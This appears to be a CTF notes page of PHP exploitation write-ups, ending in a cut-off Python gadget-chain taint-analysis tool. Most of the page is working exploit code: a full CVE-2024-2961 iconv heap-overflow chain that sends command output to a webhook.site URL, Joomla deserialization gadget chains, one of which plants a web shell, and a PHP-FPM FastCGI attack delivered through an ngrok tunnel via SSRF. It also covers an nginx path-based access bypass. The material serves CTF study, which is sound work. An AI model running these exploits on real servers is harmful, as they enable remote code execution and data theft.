Skip to content

Categories

PHP

Proxy / WAF Protections Bypass | hacktricks. Nginx FPM configuration: Nginx is configured to block access to /admin.php, but it's possible to bypass this by accessing /admin.php/index.php. tl;dr ab...

Created

Updated

87 min read

Reading time

1 category

Topics covered

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.

PHP

CVE-2024-2961 iconv

Event Name: 0xl4ugh
GitHub URL: -
Challenge Name: 0xNote
Attachments
References

solve

Now that we can read arbitrary files, we can move to the next level: RCE. The key vulnerability here is CVE-2024-2961.

Vuln lab:

https://github.com/vulhub/vulhub/blob/master/php/CVE-2024-2961/README.md

POC:

https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py

Because I’m just a chicken when it comes to pwn, I’ll only list what we need to read:

  • /proc/self/maps
  • Use SPLFileObject('php://<iconv to set the charset>') to trigger RCE
  • For full details, you can read here : https://blog.lexfo.fr/iconv-cve-2024-2961-p1.html

    Full solve script

    This is my solve script to bypass nginx -> read file -> set the charset to trigger RCE (Remember to change the webhook URL to your own)

    import requests
    from pwn import *
    import re
    import base64
    import zlib
    from bs4 import BeautifulSoup
    
    # One shared HTTP session, reused by every request made in get_file()
    # (presumably so the login state carries over between requests).
    session = requests.Session()

    ## Constant

    # 2 MiB: used by PWN_Core.find_main_heap as both the minimum size and the
    # alignment of a candidate heap region.
    HEAP_SIZE = 2 * 1024 * 1024
    # UTF-8 bytes of "劄"; placed at the very end of the step3_overflow bucket,
    # which is fed to the UTF-8 -> ISO-2022-CN-EXT iconv filter.
    BUG = "劄".encode("utf-8")
    
    ## Post init function
    
    def get_file(url, path):
        """Read ``path`` from the target and return its decoded bytes.

        The path is wrapped in a ``convert.base64-encode`` php://filter and
        stored as a note; the note is then read back from the ``noteContent``
        element of index.php and base64-decoded.
        """
        wrapped = f"php://filter/convert.base64-encode/resource={path}"
        session.post(url + 'login.php', data={'username':'winky'})
        session.post(url + 'index.php', data={'note':wrapped})
        session.post(url + '/premium.php/index.php', data={'color': 'SplFileObject'})
        page = session.get(url + 'index.php')
        note = BeautifulSoup(page.text, "html.parser").find("div", id="noteContent")
        encoded = note.get_text(strip=True)
        return base64.b64decode(encoded)
    
    def compress(data):
        """Compress ``data`` at level 9 and return the raw deflate stream.

        The first 2 bytes (zlib header) and the last 4 bytes (checksum trailer)
        of the zlib output are dropped.
        """
        framed = zlib.compress(data, 9)
        return framed[2:-4]
    
    def compressed_bucket(data):
        """Frame ``data`` with chunked_chunk() using a fixed total size of 0x8000."""
        return chunked_chunk(data, size=0x8000)
    
    def qpe(data):
        """Encode every byte of ``data`` as an uppercase ``=XX`` triplet and return bytes."""
        encoded = "".join(f"={byte:02X}" for byte in data)
        return encoded.encode()
    
    def ptr_bucket(*ptrs, size=None):
        """Pack ``ptrs`` with p64() and wrap the result into a compressed bucket.

        The packed bytes are ``=XX``-encoded with qpe(), framed three times with
        chunked_chunk(), and finally framed with compressed_bucket(). When
        ``size`` is given it must equal 8 bytes per pointer.
        """
        if size is not None:
            assert len(ptrs) * 8 == size
        payload = qpe(b"".join(p64(ptr) for ptr in ptrs))
        for _ in range(3):
            payload = chunked_chunk(payload)
        return compressed_bucket(payload)
    
    def chunked_chunk(data, size: int = None):
        """Frame ``data`` as ``<hex length>\\n<data>\\n``.

        The hex length is left-padded with zeros so that, when it fits, the whole
        frame is ``size`` bytes long. ``size`` defaults to ``len(data) + 8``.
        """
        total = len(data) + 8 if size is None else size
        # Two bytes of the frame are taken by the newlines around the data.
        digits = total - (len(data) + len(b"\n\n"))
        header = format(len(data), "x").rjust(digits, "0")
        return header.encode() + b"\n" + data + b"\n"
    
    ## Pwn core
    
    class PWN_Core():
        """Build the php://filter path for a target ``url`` and shell ``command``.

        The instance reads /proc/self/maps and the libc binary from the target
        through get_file(), then assembles the filter chain in
        build_exploit_path().
        """

        def __init__(self, url, command) -> None:
            self.url = url
            self.command = command
            # Filled by get_symbols_and_addresses(): "heap" (int) and "libc" (ELF).
            self.info = {}
            self.heap = None
            # Number of times the padding bucket is repeated in build_exploit_path().
            self.pad = 20

        class Region():
            """One parsed line of /proc/self/maps."""

            def __init__(self, start, stop, permissions, path):
                self.start = int(start)
                self.stop = int(stop)
                self.permissions = permissions
                self.path = path

            @property
            def size(self) -> int:
                """Length of the region in bytes."""
                return self.stop - self.start

        def download_file(self, remote_path: str, local_path: str) -> None:
            """Read ``remote_path`` from the target and write it to ``local_path``."""
            # Imported here because the script's import block does not bring
            # ``Path`` into scope.
            from pathlib import Path

            data = get_file(self.url, remote_path)
            Path(local_path).write_bytes(data)

        def get_regions(self):
            """Fetch /proc/self/maps from the target and return it as Region objects.

            Lines that do not match the expected format are skipped; the whole
            maps text is printed for each such line.
            """
            maps = get_file(self.url, "/proc/self/maps")
            maps = maps.decode()
            PATTERN = re.compile(
                r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
            )
            regions = []
            for region in [line.strip() for line in maps.strip().split('\n')]:
                if match := PATTERN.match(region):
                    start = int(match.group(1), 16)
                    stop = int(match.group(2), 16)
                    permissions = match.group(3)
                    path = match.group(4)
                    # Keep only the trailing path / [name] token; anonymous
                    # mappings get an empty path.
                    if "/" in path or "[" in path:
                        path = path.rsplit(" ", 1)[-1]
                    else:
                        path = ""
                    current = self.Region(start, stop, permissions, path)
                    regions.append(current)

                else:
                    print(maps)
            return regions

        def _get_region(self, regions: list[Region], *names: str) -> Region:
            """Return the first region whose path contains any of ``names``.

            Raises:
                LookupError: if no region matches. The previous behaviour was to
                    return the last region regardless, or to fail with
                    UnboundLocalError on an empty list.
            """
            for region in regions:
                if any(name in region.path for name in names):
                    return region
            raise LookupError(f"Unable to locate a region matching {names!r}")

        def find_main_heap(self, regions):
            """Return the address used as the main heap, derived from ``regions``.

            Candidates are ``rw-p`` regions of at least HEAP_SIZE bytes whose end
            is HEAP_SIZE-aligned and whose path is empty or ``[anon:zend_alloc]``.
            Regions are scanned from last to first and the first candidate wins.

            Raises:
                LookupError: if no region qualifies.
            """
            heaps = [
                region.stop - HEAP_SIZE + 0x40
                for region in reversed(regions)
                if region.permissions == "rw-p"
                and region.size >= HEAP_SIZE
                and region.stop & (HEAP_SIZE-1) == 0
                and region.path in ("", "[anon:zend_alloc]")
            ]
            if not heaps:
                raise LookupError("Unable to find a candidate main heap region")
            return heaps[0]

        def get_symbols_and_addresses(self) -> None:
            """Populate ``self.info`` with the heap address and a rebased libc ELF."""
            regions = self.get_regions()
            LIBC_FILE = "./libc"
            self.info["heap"] = self.find_main_heap(regions)
            libc = self._get_region(regions, "libc-", "libc.so")
            self.download_file(libc.path, LIBC_FILE)
            self.info["libc"] = ELF(LIBC_FILE, checksec=False)
            self.info["libc"].address = libc.start

        def build_exploit_path(self):
            """Return the php://filter path built from the target's heap and libc addresses.

            The resource is a base64 ``data:`` URI holding the concatenated
            buckets, compressed twice with compress(). The filter chain inflates
            twice and then runs the dechunk / iconv steps described by the
            comments on the ``filters`` list below.
            """

            self.get_symbols_and_addresses()

            LIBC = self.info["libc"]
            ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
            ADDR_EFREE = LIBC.symbols["__libc_system"]
            ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]
            ADDR_HEAP = self.info["heap"]
            ADDR_FREE_SLOT = ADDR_HEAP + 0x20
            ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168
            ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10
            CS = 0x100

            pad_size = CS - 0x18
            pad = b"\x00" * pad_size
            pad = chunked_chunk(pad, len(pad) + 6)
            pad = chunked_chunk(pad, len(pad) + 6)
            pad = chunked_chunk(pad, len(pad) + 6)
            pad = compressed_bucket(pad)

            step1_size = 1
            step1 = b"\x00" * step1_size
            step1 = chunked_chunk(step1)
            step1 = chunked_chunk(step1)
            step1 = chunked_chunk(step1, CS)
            step1 = compressed_bucket(step1)

            step2_size = 0x48
            step2 = b"\x00" * (step2_size + 8)
            step2 = chunked_chunk(step2, CS)
            step2 = chunked_chunk(step2)
            step2 = compressed_bucket(step2)

            step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
            step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
            step2_write_ptr = chunked_chunk(step2_write_ptr)
            step2_write_ptr = compressed_bucket(step2_write_ptr)

            step3_size = CS
            step3 = b"\x00" * step3_size
            assert len(step3) == CS
            step3 = chunked_chunk(step3)
            step3 = chunked_chunk(step3)
            step3 = chunked_chunk(step3)
            step3 = compressed_bucket(step3)

            step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
            assert len(step3_overflow) == CS
            step3_overflow = chunked_chunk(step3_overflow)
            step3_overflow = chunked_chunk(step3_overflow)
            step3_overflow = chunked_chunk(step3_overflow)
            step3_overflow = compressed_bucket(step3_overflow)

            step4_size = CS
            step4 = b"=00" + b"\x00" * (step4_size - 1)
            step4 = chunked_chunk(step4)
            step4 = chunked_chunk(step4)
            step4 = chunked_chunk(step4)
            step4 = compressed_bucket(step4)

            step4_pwn = ptr_bucket(
                0x200000,
                0,
                # free_slot
                0,
                0,
                ADDR_CUSTOM_HEAP,  # 0x18
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                ADDR_HEAP,  # 0x140
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                size=CS,
            )

            step4_custom_heap = ptr_bucket(
                ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
            )

            step4_use_custom_heap_size = 0x140

            COMMAND = self.command
            COMMAND = f"kill -9 $PPID; {COMMAND}"
            COMMAND = COMMAND.encode() + b"\x00"

            COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")

            step4_use_custom_heap = COMMAND
            step4_use_custom_heap = qpe(step4_use_custom_heap)
            step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
            step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
            step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
            step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)

            pages = (
                step4 * 3
                + step4_pwn
                + step4_custom_heap
                + step4_use_custom_heap
                + step3_overflow
                + pad * self.pad
                + step1 * 3
                + step2_write_ptr
                + step2 * 2
            )

            resource = compress(compress(pages))
            resource = base64.b64encode(resource).decode()
            resource = f"data:text/plain;base64,{resource}"

            filters = [
                # Create buckets
                "zlib.inflate",
                "zlib.inflate",

                # Step 0: Setup heap
                "dechunk",
                "convert.iconv.L1.L1",

                # Step 1: Reverse FL order
                "dechunk",
                "convert.iconv.L1.L1",

                # Step 2: Put fake pointer and make FL order back to normal
                "dechunk",
                "convert.iconv.L1.L1",

                # Step 3: Trigger overflow
                "dechunk",
                "convert.iconv.UTF-8.ISO-2022-CN-EXT",

                # Step 4: Allocate at arbitrary address and change zend_mm_heap
                "convert.quoted-printable-decode",
                "convert.iconv.L1.L1",
            ]
            filters = "|".join(filters)
            path = f"php://filter/read={filters}/resource={resource}"
            return path
    
    def solve():
        """Build the filter path for the hard-coded target and request it once."""
        # URL = 'http://challenges2.ctf.sd:34896/'
        URL = 'http://127.0.0.1:5000/'
        path = PWN_Core(URL, 'curl https://webhook.site/ca9a194c-4098-4d72-85c1-1e96a6a62fa0/$(/readflag)').build_exploit_path()
        try:
            get_file(URL, path)
        except Exception:
            # Best effort: the final request is expected to fail (the command is
            # prefixed with "kill -9 $PPID"), so errors are ignored here.
            # Only Exception is caught so Ctrl-C / SystemExit still propagate.
            pass
        print('Exploit sucessfully')
    solve()
    

    PHP-FPM

    Proxy / WAF Protections Bypass | hacktricks

    Nginx FPM configuration:

    Copy

    # Exact-match location: only the URI "/admin.php" itself is denied.
    location = /admin.php {
        deny all;
    }
    
    # Every URI ending in ".php" (for example /admin.php/index.php) is passed to PHP-FPM.
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php8.1-fpm.sock;
    }

    Nginx is configured to block access to /admin.php but it's possible to bypass this by accessing /admin.php/index.php.

    How to prevent

    Copy

    # Case-insensitive regex: deny every URI that starts with "/admin".
    location ~* ^/admin {
        deny all;
    }

    Joomla PHP Gadget Chain

    Event Name: QiangWang CTF 2025
    GitHub URL: -
    Challenge Name: -
    Attachments
    References

    solver 1
    <?php
    // https://xz.aliyun.com/t/17019?time__1311=mqGxnD9Dcim4lrzG7DyDIxhIDCUw3v33x
    // Prints a base64-encoded serialize() of a SqliteDriver whose options hold a SqliteQuery.
    // The classes below are minimal stand-ins that declare only the properties to be serialized.
    namespace Joomla\Database\Pdo {
        class PdoDriver
        {
            protected $options;
    
            public function __construct($options)
            {
                $this->options = $options;
            }
        }
    
    }
    
    namespace Symfony\Component\OptionsResolver {
    
        // All state is set through property defaults; there is no constructor.
        class OptionsResolver
        {
            private bool $locked = true;
    
            private array $defined = ['id'];
    
            private array $lazy = array(
                "orderBy" => array("array_walk_recursive")
            );
    
            private array $defaults = array(
                "orderBy" => "system"
            );
    
        }
    
    }
    
    namespace Joomla\Database\Sqlite {
        class SqliteDriver
        {
            protected $options;
    
            public function __construct($options)
            {
                $this->options = $options;
            }
        }
    
        class SqliteQuery
        {
    
            protected $type = 'select';
    
            // Holds an OptionsResolver instance (assigned in the constructor).
            protected $selectRowNumber;
            public function __construct()
            {
                $this->selectRowNumber = new \Symfony\Component\OptionsResolver\OptionsResolver();
            }
    
        }
    
    }
    
    
    namespace Joomla\CMS\Button {
    
        class ActionButton
        {
    
            protected $states = [];
    
    
            public function __construct()
            {
            }
        }
    }
    
    namespace {
    
    
    
        // NOTE(review): this ActionButton is overwritten by the next assignment and never used.
        $toStringObj = new \Joomla\CMS\Button\ActionButton();
    
        $toStringObj = new \Joomla\Database\Sqlite\SqliteQuery();
    
        $options = array(
            "driver" => $toStringObj
        );
        // NOTE(review): the PdoDriver is overwritten by the SqliteDriver below; only the latter is serialized.
        $pdoDriver = new \Joomla\Database\Pdo\PdoDriver($options);
        $pdoDriver = new \Joomla\Database\Sqlite\SqliteDriver($options);
    
    
        $ser = serialize($pdoDriver);
    
        // Output the payload as base64.
        echo base64_encode($ser);
    }
    solver 2

    Found an entirely different one, bypass of patched chain

    <?php
    // Builds an array ($res) containing a FormattedtextLogger and a User that share one
    // referenced boolean. The classes below are minimal stand-ins declaring only the needed properties.
    namespace Joomla\Filesystem {
        // NOTE(review): Stream is declared but not instantiated anywhere in this snippet.
        class Stream
        {
            protected $a;
            protected $b;
            protected $fh = "fdsafa";
    
            public function __construct($a, $b)
            {
                $this->a = $a;
                $this->b = $b;
            }
        }
    }
    namespace Joomla\CMS\Log\Logger {
        class FormattedtextLogger
        {
            public $defer;
            protected $options = ['text_file_no_php' => true];
            protected $path;
            public $deferredEntries = [];
            protected $format = '{F}';
            protected $fields = ['F'];
            public function __construct($path, $deferredEntries)
            {
                $this->path = $path;
                $this->deferredEntries = $deferredEntries;
            }
        }
    }
    namespace Joomla\CMS\User {
        class User
        {
            public $guest;
    
            public function __construct($guest)
            {
                $this->guest = $guest;
            }
        }
    }
    namespace {
                $path = "hui.php";
                $data = "<?php system(\$_GET['cmd']); ?>";
    
                // NOTE(review): $hui is never used below.
                $hui = new \stdClass();
                // NOTE(review): \Joomla\CMS\Log\LogEntry is not declared in this snippet; it must be provided elsewhere.
                $entry = new \Joomla\CMS\Log\LogEntry($data);
                $entries = [$entry, $entry];
                $defer = false;
                $res = [
                    $defer,
                ];
                // $res[1] becomes a reference to $res[0].
                $res[] =& $res[0];
                $user = new \Joomla\CMS\User\User(
                    $defer
                );
                $logger = new \Joomla\CMS\Log\Logger\FormattedtextLogger(
                    $path,
                    $entries, // Reference to the array in LogEntry
                );
                // Both objects now point at the same value as $res[0].
                $user->guest =& $res[0];
                $logger->defer =& $res[0];
    
                $res[] = $logger;
                $res[] = $user;
                // NOTE(review): the array is returned, not serialized; presumably the including code serializes it.
                return $res;
            
    }

    Exposed PHP FPM Exploit

    solve
    import random
    import httpx
    from pyngrok import ngrok
    from flask import Flask
    from multiprocessing import Process
    
    
    # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
    # Referrer: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
    
    # Base URL of the target web application (used as the httpx base_url in API).
    RHOST = "http://54.251.191.248:31530/"
    # RHOST = "http://localhost:31530/"
    # ngrok HTTP tunnel to local port 4444, the port the Flask app in web() listens on.
    TUNNEL = ngrok.connect(4444, "http")
    
    
    def bchr(i):
        """Return the single byte whose value is the integer ``i``."""
        return bytes((i,))
    
    
    def bord(c):
        """Return ``c`` unchanged if it is already an int, otherwise ``ord(c)``."""
        return c if isinstance(c, int) else ord(c)
    
    
    def force_bytes(s):
        """Return ``s`` as bytes, UTF-8 encoding it (strict) when it is not bytes already."""
        return s if isinstance(s, bytes) else s.encode('utf-8', 'strict')
    
    
    def force_text(s):
        """Return ``s`` as str: strings pass through, bytes are UTF-8 decoded, anything else goes through str()."""
        if issubclass(type(s), str):
            return s
        return str(s, 'utf-8', 'strict') if isinstance(s, bytes) else str(s)
    
    
    class FastCGIClient:
        """A Fast-CGI Client for Python

        This class only encodes requests (and decodes records); it does not open
        a connection itself. ``host`` and ``port`` are informational attributes
        shown by ``repr()`` and default to ``None``.
        """

        # private
        __FCGI_VERSION = 1

        __FCGI_ROLE_RESPONDER = 1
        __FCGI_ROLE_AUTHORIZER = 2
        __FCGI_ROLE_FILTER = 3

        __FCGI_TYPE_BEGIN = 1
        __FCGI_TYPE_ABORT = 2
        __FCGI_TYPE_END = 3
        __FCGI_TYPE_PARAMS = 4
        __FCGI_TYPE_STDIN = 5
        __FCGI_TYPE_STDOUT = 6
        __FCGI_TYPE_STDERR = 7
        __FCGI_TYPE_DATA = 8
        __FCGI_TYPE_GETVALUES = 9
        __FCGI_TYPE_GETVALUES_RESULT = 10
        __FCGI_TYPE_UNKOWNTYPE = 11

        __FCGI_HEADER_SIZE = 8

        # request state
        FCGI_STATE_SEND = 1
        FCGI_STATE_ERROR = 2
        FCGI_STATE_SUCCESS = 3

        def __init__(self):
            self.keepalive = 0
            self.requests = dict()
            # Defined so __repr__ works; nothing in this class assigns them.
            self.host = None
            self.port = None

        def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
            """Return one record: 8-byte header (no padding) followed by ``content``.

            Raises:
                ValueError: if ``content`` is longer than 65535 bytes, because the
                    header stores the length in two bytes and a longer payload
                    would produce a record with a truncated length field.
            """
            length = len(content)
            if length > 0xFFFF:
                raise ValueError(
                    "FastCGI record content is limited to 65535 bytes, got %d" % length
                )
            buf = bchr(FastCGIClient.__FCGI_VERSION) \
                + bchr(fcgi_type) \
                + bchr((requestid >> 8) & 0xFF) \
                + bchr(requestid & 0xFF) \
                + bchr((length >> 8) & 0xFF) \
                + bchr(length & 0xFF) \
                + bchr(0) \
                + bchr(0) \
                + content
            return buf

        def __encodeNameValueParams(self, name, value):
            """Return ``name``/``value`` (bytes) prefixed with their encoded lengths.

            A length below 128 takes one byte; otherwise it takes four bytes with
            the top bit of the first byte set.
            """
            nLen = len(name)
            vLen = len(value)
            record = b''
            if nLen < 128:
                record += bchr(nLen)
            else:
                record += bchr((nLen >> 24) | 0x80) \
                    + bchr((nLen >> 16) & 0xFF) \
                    + bchr((nLen >> 8) & 0xFF) \
                    + bchr(nLen & 0xFF)
            if vLen < 128:
                record += bchr(vLen)
            else:
                record += bchr((vLen >> 24) | 0x80) \
                    + bchr((vLen >> 16) & 0xFF) \
                    + bchr((vLen >> 8) & 0xFF) \
                    + bchr(vLen & 0xFF)
            return record + name + value

        def __decodeFastCGIHeader(self, stream):
            """Decode the first eight bytes of ``stream`` into a header dict."""
            header = dict()
            header['version'] = bord(stream[0])
            header['type'] = bord(stream[1])
            header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
            header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
            header['paddingLength'] = bord(stream[6])
            header['reserved'] = bord(stream[7])
            return header

        def __decodeFastCGIRecord(self, buffer):
            """Read one record from ``buffer``; return ``False`` when no header is left."""
            header = buffer.read(int(self.__FCGI_HEADER_SIZE))

            if not header:
                return False

            record = self.__decodeFastCGIHeader(header)
            record['content'] = b'' + buffer.read(int(record['contentLength']))
            # Consume the padding so the next read starts at the next record.
            buffer.read(int(record['paddingLength']))
            return record

        def request(self, nameValuePairs=None, post=''):
            """Return the raw bytes of one FastCGI request.

            Args:
                nameValuePairs: mapping of parameter names to values (str or
                    bytes); ``None`` or an empty mapping sends no parameters.
                post: request body (str or bytes) sent as STDIN; may be empty.

            The result is a BEGIN record (responder role), an optional PARAMS
            record plus the empty PARAMS terminator, and an optional STDIN record
            plus the empty STDIN terminator, all under one random request id.
            """
            requestId = random.randint(1, (1 << 16) - 1)
            self.requests[requestId] = dict()
            request = b""
            beginFCGIRecordContent = bchr(0) \
                + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
                + bchr(self.keepalive) \
                + bchr(0) * 5
            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
                                                  beginFCGIRecordContent, requestId)
            paramsRecord = b''
            for (name, value) in (nameValuePairs or {}).items():
                name = force_bytes(name)
                value = force_bytes(value)
                paramsRecord += self.__encodeNameValueParams(name, value)

            if paramsRecord:
                request += self.__encodeFastCGIRecord(
                    FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
            request += self.__encodeFastCGIRecord(
                FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)

            if post:
                request += self.__encodeFastCGIRecord(
                    FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
            request += self.__encodeFastCGIRecord(
                FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)

            return request

        def __repr__(self):
            return "fastcgi connect host:{} port:{}".format(self.host, self.port)
    
    
    def build_request(cmd):
        """Return the raw FastCGI request bytes whose body wraps ``cmd`` in PHP backticks.

        The body is encoded to UTF-8 once, up front, so that CONTENT_LENGTH is
        the number of bytes actually sent (it used to be the character count,
        which is wrong for non-ASCII commands).
        """
        client = FastCGIClient()
        documentRoot = "/"
        uri = "/usr/local/lib/php/System.php"
        content = f"<?=`{cmd}`?>".encode('utf-8')
        params = {
            'GATEWAY_INTERFACE': 'FastCGI/1.0',
            'REQUEST_METHOD': 'POST',
            'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
            'SCRIPT_NAME': uri,
            'QUERY_STRING': '',
            'REQUEST_URI': uri,
            'DOCUMENT_ROOT': documentRoot,
            'SERVER_SOFTWARE': 'php/fcgiclient',
            'REMOTE_ADDR': '127.0.0.1',
            'REMOTE_PORT': '9985',
            'SERVER_ADDR': '127.0.0.1',
            'SERVER_PORT': '80',
            'SERVER_NAME': "localhost",
            'SERVER_PROTOCOL': 'HTTP/1.1',
            'CONTENT_TYPE': 'application/text',
            'CONTENT_LENGTH': "%d" % len(content),
            'PHP_VALUE': 'auto_prepend_file = php://input',
            'PHP_ADMIN_VALUE': 'allow_url_include = On'
        }
        return client.request(params, content)
    
    def web(cmd):
        """Serve build_request(cmd) on GET ``/`` from a Flask app bound to 0.0.0.0:4444."""
        app = Flask(__name__)

        @app.route("/", methods=["GET"])
        def data():
            return build_request(cmd)

        app.run(host="0.0.0.0", port=4444)
    
    
    
    class API:
        """Small httpx wrapper bound to RHOST."""

        def __init__(self) -> None:
            self.c = httpx.Client(base_url=RHOST)

        def curl(self, args):
            """POST ``args`` as the ``urlInput`` form field to ``/`` and return the response."""
            form = {"urlInput": args}
            return self.c.post("/", data=form)
    
    
    if __name__ == '__main__':
        cmd = "cat /flag*"
        # The Flask app runs in a child process so this process can drive the requests.
        proc = Process(target=web, args=(cmd,))
        proc.start()
        try:
            url = TUNNEL.public_url
            print(url)
            api = API()
            res = api.curl(f"{url} -o /tmp/data")
            res = api.curl("telnet://localhost:9000 -T /tmp/data")
            print(res.text)
        finally:
            # Always stop the helper server, even when one of the requests above raises.
            proc.kill()
            proc.join()

    Gadget Taint Analysis in PHP and Symfony bundle part POP Chain

    Event Name: Infobahn CTF 2025
    GitHub URL: -
    Challenge Name: Padoru Pwn Parade
    Attachments

    normal:

    revenge:

    References

    Unintended

    using AST

    #!/usr/bin/env python3
    """
    Advanced PHP Gadget Chain Taint Analysis Tool
    Uses php-ast Python module for accurate AST parsing
    Supports multi-level taint tracking and object injection detection
    
    Installation:
        pip install php-ast
    
    Usage:
        python gadget_analyzer.py -d /path/to/php/project -r
    """
    
    import os
    import sys
    import json
    import argparse
    import subprocess
    import shutil
    import tempfile
    from pathlib import Path
    from dataclasses import dataclass, field
    from typing import Dict, List, Set, Optional, Any
    from collections import defaultdict, deque
    from enum import Enum
    
    # Increase recursion limit as safety measure (though we use iterative traversal)
    sys.setrecursionlimit(5000)
    
    # php-ast is optional: record whether the import worked so PHPASTParser can
    # decide between the module and the PHP CLI fallback.
    try:
        from php_ast import php_ast
        PHP_AST_AVAILABLE = True
    except ImportError:
        PHP_AST_AVAILABLE = False
        print("Warning: php-ast module not found. Install with: pip install php-ast")
    
    
    class TaintLevel(Enum):
        """Taint severity levels"""
        # Values run from 0 (SAFE) to 4 (CRITICAL) in increasing severity.
        SAFE = 0
        LOW = 1
        MEDIUM = 2
        HIGH = 3
        CRITICAL = 4
    
    
    @dataclass
    class TaintSource:
        """Represents a taint source"""
        name: str
        # Class and method in which the source was found (presumably; confirm against the analyzer).
        class_name: str
        method_name: str
        variable: str
        location: str
        source_type: str
        # Defaults to 1.0; the scale is not defined in this part of the file.
        confidence: float = 1.0
    
    
    @dataclass
    class TaintSink:
        """Represents a dangerous sink"""
        name: str
        class_name: str
        method_name: str
        filepath: str
        location: str
        function: str
        severity: TaintLevel
        line: int
        # Each instance gets its own empty list by default.
        parameters: List[str] = field(default_factory=list)
    
    
    @dataclass
    class CallSite:
        """Represents a function/method call"""
        caller_class: str
        caller_method: str
        # May be None (presumably when the callee class is unknown or the call is a plain function).
        callee_class: Optional[str]
        callee_method: str
        call_type: str
        line: int
        # Optional; defaults to None.
        variable: Optional[str] = None
    
    
    @dataclass
    class PropertyAccess:
        """Property access tracking"""
        class_name: str
        method_name: str
        property_name: str
        # Kind of access; the allowed values are not defined in this part of the file.
        access_type: str
        line: int
    
    
    @dataclass
    class GadgetChain:
        """Detected gadget chain"""
        chain_id: int
        entry_points: List[str]
        # List of dicts; their keys are not defined in this part of the file.
        chain_path: List[Dict[str, Any]]
        sink: TaintSink
        severity: TaintLevel
        confidence: float
        description: str
        injectable_objects: List[Dict[str, Any]]
        exploitation_notes: str
    
    
    class PHPASTParser:
        """Parser that leverages php-ast module with a PHP CLI fallback"""
        
        def __init__(self):
            """Set up the CLI fallback and the php-ast module parser.

            Raises:
                RuntimeError: if neither the module nor the CLI parser is usable.
            """
            self.cli_parser = self._init_cli_parser()
            if PHP_AST_AVAILABLE:
                self.parser = php_ast()
            else:
                self.parser = None

            if self.parser or self.cli_parser:
                return
            raise RuntimeError(
                "php-ast module or PHP CLI ast extension is required. "
                "Install python package with: pip install php-ast or enable the PHP ast extension."
            )
        
        def parse_file(self, filepath: str) -> Dict:
            """Parse PHP file and return AST"""
            result = self._parse_with_module(filepath)
            if result['success'] or not self.cli_parser:
                return result
            
            return self._parse_with_cli(filepath)
        
        def parse_code(self, code: bytes) -> Dict:
            """Parse PHP code bytes and return AST"""
            result = self._parse_code_with_module(code)
            if result['success'] or not self.cli_parser:
                return result
            
            tmp_file = None
            try:
                with tempfile.NamedTemporaryFile('wb', suffix='.php', delete=False) as handle:
                    handle.write(code)
                    tmp_file = handle.name
                cli_result = self._parse_with_cli(tmp_file)
                return cli_result
            finally:
                if tmp_file and os.path.exists(tmp_file):
                    os.unlink(tmp_file)
    
        def _parse_with_module(self, filepath: str) -> Dict[str, Any]:
            if not self.parser:
                return {
                    'filepath': filepath,
                    'ast': None,
                    'success': False,
                    'error': 'php-ast module unavailable'
                }
            
            try:
                result = self.parser.get_file_ast(filepath)
                if result.get('status') == 'successed':
                    return {
                        'filepath': filepath,
                        'ast': result.get('ast'),
                        'success': True
                    }
                return {
                    'filepath': filepath,
                    'ast': None,
                    'success': False,
                    'error': result.get('error') or result.get('reason') or 'Unknown error'
                }
            except Exception as exc:
                return {
                    'filepath': filepath,
                    'ast': None,
                    'success': False,
                    'error': str(exc)
                }
    
        def _parse_code_with_module(self, code: bytes) -> Dict[str, Any]:
            if not self.parser:
                return {
                    'ast': None,
                    'success': False,
                    'error': 'php-ast module unavailable'
                }
            
            try:
                result = self.parser.get_ast(code)
                if result.get('status') == 'successed':
                    return {
                        'ast': result.get('ast'),
                        'success': True
                    }
                return {
                    'ast': None,
                    'success': False,
                    'error': result.get('error') or result.get('reason') or 'Unknown error'
                }
            except Exception as exc:
                return {
                    'ast': None,
                    'success': False,
                    'error': str(exc)
                }
    
        def _parse_with_cli(self, filepath: str) -> Dict[str, Any]:
            if not self.cli_parser:
                return {
                    'filepath': filepath,
                    'ast': None,
                    'success': False,
                    'error': 'PHP CLI parser unavailable'
                }
            
            cmd = [
                self.cli_parser['binary'],
                self.cli_parser['script'],
                filepath,
                str(self.cli_parser['version'])
            ]
            
            try:
                result = subprocess.run(
                    cmd,
                    capture_output=True,
                    text=True,
                    check=False
                )
            except Exception as exc:
                return {
                    'filepath': filepath,
                    'ast': None,
                    'success': False,
                    'error': f"PHP CLI invocation failed: {exc}"
                }
            
            stdout = result.stdout.strip()
            try:
                parsed = json.loads(stdout) if stdout else {}
            except json.JSONDecodeError:
                return {
                    'filepath': filepath,
                    'ast': None,
                    'success': False,
